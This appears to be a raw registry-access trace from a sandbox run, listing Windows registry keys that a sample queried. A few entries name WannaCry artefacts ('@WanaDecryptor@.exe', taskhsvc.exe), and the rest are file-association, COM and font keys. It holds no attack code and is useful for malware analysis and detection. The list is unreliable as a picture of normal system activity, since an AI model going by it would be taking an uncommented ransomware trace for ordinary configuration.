HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell
HKEY_CURRENT_USER\Software\Classes\exefile\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open
HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DropTarget
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CURRENT_USER\Software\Classes\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CURRENT_USER\Software\Classes\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_CURRENT_USER\Software\Classes\.asp
HKEY_CLASSES_ROOT\.bas
HKEY_CURRENT_USER\Software\Classes\.bas
HKEY_CLASSES_ROOT\.bat
HKEY_CURRENT_USER\Software\Classes\.bat
HKEY_CLASSES_ROOT\.cer
HKEY_CURRENT_USER\Software\Classes\.cer
HKEY_CLASSES_ROOT\.chm
HKEY_CURRENT_USER\Software\Classes\.chm
HKEY_CLASSES_ROOT\.cmd
HKEY_CURRENT_USER\Software\Classes\.cmd
HKEY_CLASSES_ROOT\.com
HKEY_CURRENT_USER\Software\Classes\.com
HKEY_CLASSES_ROOT\.cpl
HKEY_CURRENT_USER\Software\Classes\.cpl
HKEY_CLASSES_ROOT\.crt
HKEY_CURRENT_USER\Software\Classes\.crt
HKEY_CLASSES_ROOT\.csh
HKEY_CLASSES_ROOT\.der
HKEY_CURRENT_USER\Software\Classes\.der
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ddeexec
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OfficeClickToRun.exe
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\setup\PnpLockdownFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant
HKEY_CLASSES_ROOT\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Grzc\@JnanQrpelcgbe@.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\BidInterface\Loader
HKEY_CURRENT_USER\SOFTWARE\ODBC\ODBC.INI\ODBC
HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI\ODBC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInset
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragMinDist
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\@WanaDecryptor@.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Segoe UI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{808b4612-d164-11f0-869d-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{808b4612-d164-11f0-869d-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{808b4612-d164-11f0-869d-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{808b4612-d164-11f0-869d-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{808b4612-d164-11f0-869d-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{808b4612-d164-11f0-869d-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_CLASSES\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\TreatAs
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\AppID
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_CLASSES\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\ServiceParameters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\LoadUserSettings
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\Elevation
HKEY_USERS\S-1-5-20_Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Elevation
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_CLASSES\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Elevation
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Environment
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Volatile Environment
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\taskhsvc.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arabic Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arabic Transparent Bold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arabic Transparent,0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arabic Transparent Bold,0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Helvetica
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial Baltic,186
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial CE,238
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial CYR,204
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial Greek,161
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial TUR,162
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New Baltic,186
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New CE,238
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New CYR,204
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New Greek,161
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New TUR,162
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman Baltic,186
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman CE,238
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman CYR,204
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman Greek,161
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman TUR,162
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\MS Shell Dlg 2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Tahoma Armenian
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Helv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Tms Rmn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\David Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Miriam Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Fixed Miriam Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Rod Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\FangSong_GB2312
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\KaiTi_GB2312
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\MS Shell Dlg
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Arial
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\MS Sans Serif
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\LaunchPermission
